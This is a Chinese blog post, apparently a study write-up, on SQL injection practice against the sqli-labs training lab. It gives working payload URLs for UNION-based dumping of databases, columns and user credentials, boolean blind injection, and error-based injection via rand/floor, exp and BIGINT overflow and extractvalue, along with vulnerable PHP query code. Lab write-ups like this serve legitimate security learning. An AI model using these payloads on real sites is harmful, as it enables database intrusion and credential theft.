<!DOCTYPE html>



  


<html class="theme-next muse use-motion" lang="zh-Hans">
<head><meta name="generator" content="Hexo 3.8.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css">







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="sql注入,">










<meta name="description" content="GET型注入 数据库注入流程  1. 爆破数据库          使用group_concat函数查询INFORMATION_SCHEMA库的SCHEMATA表SCHEMA_NAME字段。                    group_concat将同一字段分组的字符串连接返回。          因此有payload:          1               http://129">
<meta name="keywords" content="sql注入">
<meta property="og:type" content="article">
<meta property="og:title" content="sql注入--基于sqli-labs">
<meta property="og:url" content="https://srat1999.top/2019/07/30/sql注入-基于sqli-labs/index.html">
<meta property="og:site_name" content="Stay hungry stay foolish">
<meta property="og:description" content="GET型注入 数据库注入流程  1. 爆破数据库          使用group_concat函数查询INFORMATION_SCHEMA库的SCHEMATA表SCHEMA_NAME字段。                    group_concat将同一字段分组的字符串连接返回。          因此有payload:          1               http://129">
<meta property="og:locale" content="zh-Hans">
<meta property="og:image" content="https://raw.githubusercontent.com/srat1999/Pictures/master/img/Snipaste_2019-07-30_21-17-59.png">
<meta property="og:image" content="https://raw.githubusercontent.com/srat1999/Pictures/master/img/Snipaste_2019-07-30_21-30-08.png">
<meta property="og:image" content="https://raw.githubusercontent.com/srat1999/Pictures/master/img/Snipaste_2019-07-30_21-40-16.png">
<meta property="og:image" content="https://raw.githubusercontent.com/srat1999/Pictures/master/img/Snipaste_2019-07-30_21-50-07.png">
<meta property="og:image" content="https://raw.githubusercontent.com/srat1999/Pictures/master/img/Snipaste_2019-07-30_21-56-01.png">
<meta property="og:image" content="https://raw.githubusercontent.com/srat1999/Pictures/master/img/Snipaste_2019-07-31_13-37-56.png">
<meta property="og:image" content="https://raw.githubusercontent.com/srat1999/Pictures/master/img/Snipaste_2019-07-31_13-40-00.png">
<meta property="og:image" content="https://raw.githubusercontent.com/srat1999/Pictures/master/img/Snipaste_2019-07-31_13-41-48.png">
<meta property="og:image" content="https://raw.githubusercontent.com/srat1999/Pictures/master/img/Snipaste_2019-07-31_13-43-25.png">
<meta property="og:image" content="https://raw.githubusercontent.com/srat1999/Pictures/master/img/Snipaste_2019-07-31_15-35-12.png">
<meta property="og:image" content="https://raw.githubusercontent.com/srat1999/Pictures/master/img/Snipaste_2019-07-31_15-42-34.png">
<meta property="og:image" content="https://raw.githubusercontent.com/srat1999/Pictures/master/img/Snipaste_2019-07-31_15-47-02.png">
<meta property="og:image" content="https://raw.githubusercontent.com/srat1999/Pictures/master/img/Snipaste_2019-07-31_15-48-40.png">
<meta property="og:image" content="https://raw.githubusercontent.com/srat1999/Pictures/master/img/Snipaste_2019-07-31_15-52-00.png">
<meta property="og:image" content="https://raw.githubusercontent.com/srat1999/Pictures/master/img/Snipaste_2019-08-01_08-11-31.png">
<meta property="og:image" content="https://raw.githubusercontent.com/srat1999/Pictures/master/img/Snipaste_2019-08-01_08-36-58.png">
<meta property="og:image" content="https://raw.githubusercontent.com/srat1999/Pictures/master/img/Snipaste_2019-08-01_09-03-40.png">
<meta property="og:image" content="https://raw.githubusercontent.com/srat1999/Pictures/master/img/Snipaste_2019-08-10_15-30-01.png">
<meta property="og:image" content="https://raw.githubusercontent.com/srat1999/Pictures/master/img/Snipaste_2019-08-01_21-59-54.png">
<meta property="og:image" content="https://raw.githubusercontent.com/srat1999/Pictures/master/img/Snipaste_2019-08-01_22-01-12.png">
<meta property="og:image" content="https://raw.githubusercontent.com/srat1999/Pictures/master/img/Snipaste_2019-08-01_22-05-50.png">
<meta property="og:image" content="https://raw.githubusercontent.com/srat1999/Pictures/master/img/Snipaste_2019-08-01_22-21-21.png">
<meta property="og:image" content="https://raw.githubusercontent.com/srat1999/Pictures/master/img/Snipaste_2019-08-01_22-30-46.png">
<meta property="og:image" content="https://raw.githubusercontent.com/srat1999/Pictures/master/img/Snipaste_2019-08-02_19-49-18.png">
<meta property="og:image" content="https://raw.githubusercontent.com/srat1999/Pictures/master/img/Snipaste_2019-08-02_19-57-26.png">
<meta property="og:image" content="https://raw.githubusercontent.com/srat1999/Pictures/master/img/Snipaste_2019-08-02_20-39-32.png">
<meta property="og:image" content="https://raw.githubusercontent.com/srat1999/Pictures/master/img/Snipaste_2019-08-02_20-53-29.png">
<meta property="og:image" content="https://raw.githubusercontent.com/srat1999/Pictures/master/img/Snipaste_2019-08-02_21-19-12.png">
<meta property="og:updated_time" content="2019-11-30T04:26:45.395Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="sql注入--基于sqli-labs">
<meta name="twitter:description" content="GET型注入 数据库注入流程  1. 爆破数据库          使用group_concat函数查询INFORMATION_SCHEMA库的SCHEMATA表SCHEMA_NAME字段。                    group_concat将同一字段分组的字符串连接返回。          因此有payload:          1               http://129">
<meta name="twitter:image" content="https://raw.githubusercontent.com/srat1999/Pictures/master/img/Snipaste_2019-07-30_21-17-59.png">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Muse',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="https://srat1999.top/2019/07/30/sql注入-基于sqli-labs/">





  <title>sql注入--基于sqli-labs | Stay hungry stay foolish</title>
  








<link rel="stylesheet" href="/css/prism-tomorrow.css" type="text/css"></head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Stay hungry stay foolish</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle">srat1999's blog</p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br>
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br>
            
            标签
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br>
            
            分类
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br>
            
            归档
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br>
            
            关于
          </a>
        </li>
      

      
        <li class="menu-item menu-item-search">
          
            <a href="javascript:;" class="popup-trigger">
          
            
              <i class="menu-item-icon fa fa-search fa-fw"></i> <br>
            
            搜索
          </a>
        </li>
      
    </ul>
  

  
    <div class="site-search">
      
  <div class="popup search-popup local-search-popup">
  <div class="local-search-header clearfix">
    <span class="search-icon">
      <i class="fa fa-search"></i>
    </span>
    <span class="popup-btn-close">
      <i class="fa fa-times-circle"></i>
    </span>
    <div class="local-search-input-wrapper">
      <input autocomplete="off" placeholder="搜索..." spellcheck="false" type="text" id="local-search-input">
    </div>
  </div>
  <div id="local-search-result"></div>
</div>



    </div>
  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="https://srat1999.top/2019/07/30/sql注入-基于sqli-labs/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="srat1999">
      <meta itemprop="description" content>
      <meta itemprop="image" content="/uploads/pikachu.jpg">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Stay hungry stay foolish">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">sql注入--基于sqli-labs</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2019-07-30T21:12:00+08:00">
                2019-07-30
              </time>
            

            

            
          </span>

          
            <span class="post-category">
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">分类于</span>
              
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/靶场/" itemprop="url" rel="index">
                    <span itemprop="name">靶场</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
          

          
          

          

          
            <div class="post-wordcount">
              
                
                <span class="post-meta-item-icon">
                  <i class="fa fa-file-word-o"></i>
                </span>
                
                  <span class="post-meta-item-text">字数统计&#58;</span>
                
                <span title="字数统计">
                  2.8k
                </span>
              

              
                <span class="post-meta-divider">|</span>
              

              
                <span class="post-meta-item-icon">
                  <i class="fa fa-clock-o"></i>
                </span>
                
                  <span class="post-meta-item-text">阅读时长 &asymp;</span>
                
                <span title="阅读时长">
                  13
                </span>
              
            </div>
          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h1 id="GET型注入"><a href="#GET型注入" class="headerlink" title="GET型注入"></a>GET型注入</h1><h1 id="数据库注入流程"><a href="#数据库注入流程" class="headerlink" title="数据库注入流程"></a>数据库注入流程</h1><ol>
<li><p>爆破数据库</p>
<p>使用group_concat函数查询INFORMATION_SCHEMA库的SCHEMATA表SCHEMA_NAME字段。</p>
<p><img src="https://raw.githubusercontent.com/srat1999/Pictures/master/img/Snipaste_2019-07-30_21-17-59.png" alt></p>
<p>group_concat将同一字段分组的字符串连接返回。</p>
<p>因此有payload:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://129.211.73.107/sqli-labs/Less-1/?id=-1%27%20union%20select%201,group_concat(schema_name),3%20from%20information_schema.schemata--+</span><br></pre></td></tr></table></figure>
<p>这里id=-1没有返回结果，因此返回union select后的查询语句，也就是我们想要的查询结果。</p>
<p><img src="https://raw.githubusercontent.com/srat1999/Pictures/master/img/Snipaste_2019-07-30_21-30-08.png" alt></p>
</li>
<li><p>爆破列名</p>
<p>在INFORMATION_SCHEMA.COLUMN存储所有表的列名：</p>
<p><img src="https://raw.githubusercontent.com/srat1999/Pictures/master/img/Snipaste_2019-07-30_21-40-16.png" alt></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://129.211.73.107/sqli-labs/Less-1/?id=-1%27%20union%20select%201,2,group_concat(column_name)%20from%20information_schema.columns%20where%20table_name=%27users%27%20and%20table_schema=%27security%27--+</span><br></pre></td></tr></table></figure>
<p><img src="https://raw.githubusercontent.com/srat1999/Pictures/master/img/Snipaste_2019-07-30_21-50-07.png" alt></p>
</li>
<li><p>爆数据</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://129.211.73.107/sqli-labs/Less-1/?id=-1%27%20union%20select%201,username,password%20from%20users%20where%20id=%274%E2%80%98--+</span><br></pre></td></tr></table></figure>
<p><img src="https://raw.githubusercontent.com/srat1999/Pictures/master/img/Snipaste_2019-07-30_21-56-01.png" alt></p>
<p>对id进行遍历，可以得到users表的数据。</p>
</li>
</ol>
<p>四种使用引号测试注入点的报错</p>
<ol>
<li><p>字符型</p>
<p><img src="https://raw.githubusercontent.com/srat1999/Pictures/master/img/Snipaste_2019-07-31_13-37-56.png" alt></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near &apos;&apos;1&apos;&apos; LIMIT 0,1&apos; at line 1</span><br></pre></td></tr></table></figure>
<p>后台代码：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$sql=<span class="string">"SELECT * FROM users WHERE id='$id' LIMIT 0,1"</span>;</span><br></pre></td></tr></table></figure>
</li>
<li><p>数字型</p>
<p><img src="https://raw.githubusercontent.com/srat1999/Pictures/master/img/Snipaste_2019-07-31_13-40-00.png" alt></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near &apos;&apos; LIMIT 0,1&apos; at line 1</span><br></pre></td></tr></table></figure>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$sql=<span class="string">"SELECT * FROM users WHERE id=$id LIMIT 0,1"</span>;</span><br></pre></td></tr></table></figure>
</li>
</ol>
<ol start="3">
<li><p>括号</p>
<p><img src="https://raw.githubusercontent.com/srat1999/Pictures/master/img/Snipaste_2019-07-31_13-41-48.png" alt></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near &apos;&apos;1&apos;&apos;) LIMIT 0,1&apos; at line 1</span><br></pre></td></tr></table></figure>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$sql=<span class="string">"SELECT * FROM users WHERE id=('$id') LIMIT 0,1"</span>;</span><br></pre></td></tr></table></figure>
<p>使用</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">-1&apos;)--+</span><br><span class="line">&apos;) or 1=1--+</span><br></pre></td></tr></table></figure>
</li>
</ol>
<ol start="4">
<li><p>双引号+括号</p>
<p><img src="https://raw.githubusercontent.com/srat1999/Pictures/master/img/Snipaste_2019-07-31_13-43-25.png" alt></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near &apos;&quot;1&quot;&quot;) LIMIT 0,1&apos; at line 1</span><br></pre></td></tr></table></figure>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">$id = <span class="string">'"'</span> . $id . <span class="string">'"'</span>;</span><br><span class="line">$sql=<span class="string">"SELECT * FROM users WHERE id=($id) LIMIT 0,1"</span>;</span><br></pre></td></tr></table></figure>
<p>使用</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id=2%22)%20or%201=1--+</span><br></pre></td></tr></table></figure>
<hr>
</li>
</ol>
<h4 id="ps-limit用法。"><a href="#ps-limit用法。" class="headerlink" title="ps:limit用法。"></a>ps:limit用法。</h4><p>   limit一般是用在select后面，有一个可选属性，一个必选属性。</p>
<p>   select * from mytbl limit 10000,100</p>
<p>   <strong>上边SQL语句表示从表mytbl中拿数据，跳过10000行之后，拿100行</strong></p>
<p>   select * from mytbl limit 0,100</p>
<p>   表示从表mytbl拿数据，跳过0行之后，拿取100行</p>
<p>   上面那句话等价于</p>
<p>   select * from mytbl limit 100</p>
<p>   常用于查询效率优化。</p>
<p>   <strong>上面的limit 0，1表明查从头开始查到一个结果后返回，不对后续记录进行查找。</strong></p>
<h1 id="盲注"><a href="#盲注" class="headerlink" title="盲注"></a>盲注</h1><h2 id="bool盲注"><a href="#bool盲注" class="headerlink" title="bool盲注"></a>bool盲注</h2><h3 id="使用left函数"><a href="#使用left函数" class="headerlink" title="使用left函数"></a>使用left函数</h3><ol>
<li><p>查看数据库版本</p>
<p><img src="https://raw.githubusercontent.com/srat1999/Pictures/master/img/Snipaste_2019-07-31_15-35-12.png" alt></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://129.211.73.107/sqli-labs/Less-5/?id=1%27%20and%20left(version(),1)=8--+</span><br></pre></td></tr></table></figure>
<p>这里查看数据库版本，left函数将得到的版本号的第一位字符返回。</p>
</li>
<li><p>猜解数据库名长度</p>
<p><img src="https://raw.githubusercontent.com/srat1999/Pictures/master/img/Snipaste_2019-07-31_15-42-34.png" alt></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://129.211.73.107/sqli-labs/Less-5/?id=1%27%20and%20length(database())=8--+</span><br></pre></td></tr></table></figure>
</li>
<li><p>猜解数据库名第一个字母</p>
<p><img src="https://raw.githubusercontent.com/srat1999/Pictures/master/img/Snipaste_2019-07-31_15-47-02.png" alt></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://129.211.73.107/sqli-labs/Less-5/?id=1%27%20and%20left(database(),1)%3E%27a%27--+</span><br></pre></td></tr></table></figure>
<p>第一个字母大于a？返回True页面。</p>
<p><img src="https://raw.githubusercontent.com/srat1999/Pictures/master/img/Snipaste_2019-07-31_15-48-40.png" alt></p>
<p>第一个字母小于m？返回false页面。所以第一个字母大于m。</p>
<p>一次进行二分法注入，可猜解到第一个字母为s。</p>
</li>
<li><p>猜解前两个字母</p>
<p><img src="https://raw.githubusercontent.com/srat1999/Pictures/master/img/Snipaste_2019-07-31_15-52-00.png" alt></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://129.211.73.107/sqli-labs/Less-5/?id=1%27%20and%20left(database(),2)%3C%27sm%27--+</span><br></pre></td></tr></table></figure>
<p>前两个字母是否小于‘sm’？返回True页面。</p>
</li>
<li><p>猜解前三，四，五。。。。位</p>
<p>原理相同，调节left函数参数，进行二分发注入。</p>
</li>
</ol>
<h3 id="使用ascii和substr函数"><a href="#使用ascii和substr函数" class="headerlink" title="使用ascii和substr函数"></a>使用ascii和substr函数</h3><ol>
<li><p>使用substr函数猜解表名</p>
<p>参考的《mysql天书》使用ascii函数和substr函数一起用来精确猜解表名，但猜解太耗时了。这里可以借鉴上面的二分法来猜解。不需要使用ascii函数。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://127.0.0.1/sqli-labs/Less-5/?id=1%27%20%20and%20substr((select%20table_name%20from%20information_schema.tables%20where%20table_schema=database()%20limit%200,1),1,1)%3E%27f%27--+</span><br></pre></td></tr></table></figure>
<p>判断第一个表第一个字符是否大于‘f’，</p>
<p><img src="https://raw.githubusercontent.com/srat1999/Pictures/master/img/Snipaste_2019-08-01_08-11-31.png" alt></p>
<p>返回错误，说明小于‘f’</p>
<p>于是继续用二分猜解。可得第一个表明为“email“.</p>
<p>有关如何猜解第二个表名书中也给出了。</p>
<p>更改limit参数，第二个表参数为limit 1，1。</p>
<p>其他一依次类推。</p>
</li>
</ol>
<h3 id="使用Regexp"><a href="#使用Regexp" class="headerlink" title="使用Regexp"></a>使用Regexp</h3><ol>
<li><p>正则匹配users表中的列名</p>
<p><img src="https://raw.githubusercontent.com/srat1999/Pictures/master/img/Snipaste_2019-08-01_08-36-58.png" alt></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://127.0.0.1/sqli-labs/Less-5/?id=1&apos;and 1=(select 1 from information_schema.columns where table_name=&apos;users&apos; and column_name regexp &apos;^us[a-z]&apos; limit 0,1)--+</span><br></pre></td></tr></table></figure>
</li>
</ol>
<h3 id="使用MID-ORD"><a href="#使用MID-ORD" class="headerlink" title="使用MID ORD"></a>使用MID ORD</h3><ol start="2">
<li><p>猜解users表username一列值</p>
<p><img src="https://raw.githubusercontent.com/srat1999/Pictures/master/img/Snipaste_2019-08-01_09-03-40.png" alt></p>
<p>payload:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://127.0.0.1/sqli-labs/Less-5/?id=1&apos; and ORD(MID((SELECT IFNULL(CAST(username AS CHAR),0x20)FROM security.users ORDER BY id LIMIT 0,1),1,1))=68--+</span><br></pre></td></tr></table></figure>
<p>这里说一下几个函数</p>
<ul>
<li><p>MID()  MID函数有三个参数MID(str,pos,len):str为目标字符串，pos起始位置从一开始，len截取长度。</p>
</li>
<li><p><img src="https://raw.githubusercontent.com/srat1999/Pictures/master/img/Snipaste_2019-08-10_15-30-01.png" alt="mid另外一种用法"></p>
</li>
<li><p>IFNULL() IFNULL()函数有两个参数IFNULL(exp1，exp2)，表示如果exp1为空，则返回exp2，否则返回exp1</p>
</li>
<li><p>CAST()  Cast(字段名 as 转换的类型 )</p>
</li>
</ul>
</li>
</ol>
<p>   这里猜解原理与前面类似。</p>
<h2 id="报错注入"><a href="#报错注入" class="headerlink" title="报错注入"></a>报错注入</h2><h3 id="概述"><a href="#概述" class="headerlink" title="概述"></a>概述</h3><p>mysql盲注之报错注入难度较高，手段是通过页面报错信息回显注入数据。</p>
<h3 id="rand函数"><a href="#rand函数" class="headerlink" title="rand函数"></a>rand函数</h3><p><a href="https://blog.csdn.net/qq_35544379/article/details/77453019" target="_blank" rel="noopener">这篇博客</a>给出了一些基于报错的sql盲注原理性分析。猜测根源为rand（）伪随机函数如果==固定参数==就会产生固定的随机数。而产生的特定伪随机序列会破坏mysql查询数据时建立临时表的存储数据规则。</p>
<h4 id="0x01-查询数据库"><a href="#0x01-查询数据库" class="headerlink" title="0x01 查询数据库"></a>0x01 查询数据库</h4><p><img src="https://raw.githubusercontent.com/srat1999/Pictures/master/img/Snipaste_2019-08-01_21-59-54.png" alt></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://127.0.0.1/sqli-labs/Less-5/?id=1&apos; union Select 1,count(*),concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand(0)*2))a from information_schema.columns group by a--+</span><br></pre></td></tr></table></figure>
<p>concat函数里包含我们想查询的语句。这里的0x3a起分割作用，因为16进制的冒号就是0x3a，所以如果我们不加，就是这样显示：</p>
<p><img src="https://raw.githubusercontent.com/srat1999/Pictures/master/img/Snipaste_2019-08-01_22-01-12.png" alt></p>
<p>这里我们直到有一个security数据库，但当我们面对一个陌生的数据库时我们就不知道数据库名到底是security还是security1了。。。</p>
<h4 id="0x02查用户"><a href="#0x02查用户" class="headerlink" title="0x02查用户"></a>0x02查用户</h4><p>同理：</p>
<p><img src="https://raw.githubusercontent.com/srat1999/Pictures/master/img/Snipaste_2019-08-01_22-05-50.png" alt></p>
<p>关于其他的爆表数量，列名等同理。</p>
<h3 id="double数值类型超出范围注入"><a href="#double数值类型超出范围注入" class="headerlink" title="double数值类型超出范围注入"></a>double数值类型超出范围注入</h3><p>参考<a href="https://www.cnblogs.com/lcamry/articles/5509124.html" target="_blank" rel="noopener">这篇</a>博文。</p>
<p>先贴图：</p>
<p><img src="https://raw.githubusercontent.com/srat1999/Pictures/master/img/Snipaste_2019-08-01_22-21-21.png" alt></p>
<p>exp函数返回以e为底数参数为次方的结果。发现exp（710）mysql会报整数溢出异常。</p>
<p>因此可以利用这个特性注出数据。（~为按位取反，0的取反为可表示的最大无符号整数）</p>
<h4 id="0x01举例"><a href="#0x01举例" class="headerlink" title="0x01举例"></a>0x01举例</h4><p><img src="https://raw.githubusercontent.com/srat1999/Pictures/master/img/Snipaste_2019-08-01_22-30-46.png" alt></p>
<p>payload:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://127.0.0.1/sqli-labs/Less-5/?id=1%27%20union%20select%201,2,exp(~(select%20*%20from%20(select%20version())x))--+</span><br></pre></td></tr></table></figure>
<p>利用这个还可以dump数据库，读取文件。</p>
<h3 id="BIGINT溢出"><a href="#BIGINT溢出" class="headerlink" title="BIGINT溢出"></a>BIGINT溢出</h3><p>参考<a href="https://www.cnblogs.com/lcamry/articles/5509112.html" target="_blank" rel="noopener">这篇</a>文章</p>
<p>同样先上图：</p>
<p><img src="https://raw.githubusercontent.com/srat1999/Pictures/master/img/Snipaste_2019-08-02_19-49-18.png" alt></p>
<p>~0表示最大无符号整数。</p>
<p>如果对这个整数加1，就会产生大整数溢出。而我们测试当mysql查询成功后返回0，我们对返回结果取反在加上~0,就达到我们的目的。</p>
<p>实际测试：</p>
<p><img src="https://raw.githubusercontent.com/srat1999/Pictures/master/img/Snipaste_2019-08-02_19-57-26.png" alt></p>
<p>payload:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://127.0.0.1/sqli-labs/Less-5/?id=2%27%20or%20!(select%20*%20from%20(select%20user())s)-~0--+</span><br></pre></td></tr></table></figure>
<blockquote>
<p>利用这种基于BIGINT溢出错误的注入手法，我们可以几乎可以使用MySQL中所有的数学函数，因为它们也可以进行取反，具体用法如下所示：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">&gt; select !atan((select*from(select user())a))-~0; </span><br><span class="line">&gt; select !ceil((select*from(select user())a))-~0;</span><br><span class="line">&gt; select !floor((select*from(select user())a))-~0;</span><br><span class="line">&gt;</span><br></pre></td></tr></table></figure>
</blockquote>
<blockquote>
<p>下面的我们已经测试过了，如果你愿意的话，还可以找到更多:)</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">&gt; HEX</span><br><span class="line">&gt; IN</span><br><span class="line">&gt; FLOOR</span><br><span class="line">&gt; CEIL</span><br><span class="line">&gt; RAND</span><br><span class="line">&gt; CEILING</span><br><span class="line">&gt; TRUNCATE</span><br><span class="line">&gt; TAN</span><br><span class="line">&gt; SQRT</span><br><span class="line">&gt; ROUND</span><br><span class="line">&gt; SIGN</span><br><span class="line">&gt;</span><br></pre></td></tr></table></figure>
</blockquote>
<h3 id="xpath函数报错"><a href="#xpath函数报错" class="headerlink" title="xpath函数报错"></a>xpath函数报错</h3><h4 id="extarctvalue"><a href="#extarctvalue" class="headerlink" title="extarctvalue()"></a>extarctvalue()</h4><p>相关函数：</p>
<p>​        extractvalue()：从目标XML中返回包含所查询值的字符串。<br>　　EXTRACTVALUE (XML_document, XPath_string);<br>　　第一个参数：XML_document是String格式，为XML文档对象的名称，<br>　　第二个参数：XPath_string (Xpath格式的字符串)</p>
<p>​        注入原理：如果我们输入的第二个参数不是xpath格式的字符串，则会引发报错。</p>
<p>测试：</p>
<p><img src="https://raw.githubusercontent.com/srat1999/Pictures/master/img/Snipaste_2019-08-02_20-39-32.png" alt></p>
<p>payload:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://127.0.0.1/sqli-labs/Less-5/?id=2%27%20and%20extractvalue(null,concat(0x7e,(select%20user()),0x7e))--+</span><br></pre></td></tr></table></figure>
<h4 id="updataxml"><a href="#updataxml" class="headerlink" title="updataxml()"></a>updataxml()</h4><p>首先了解下updatexml()函数.(extarctvalue()用来查，这个函数用来该)</p>
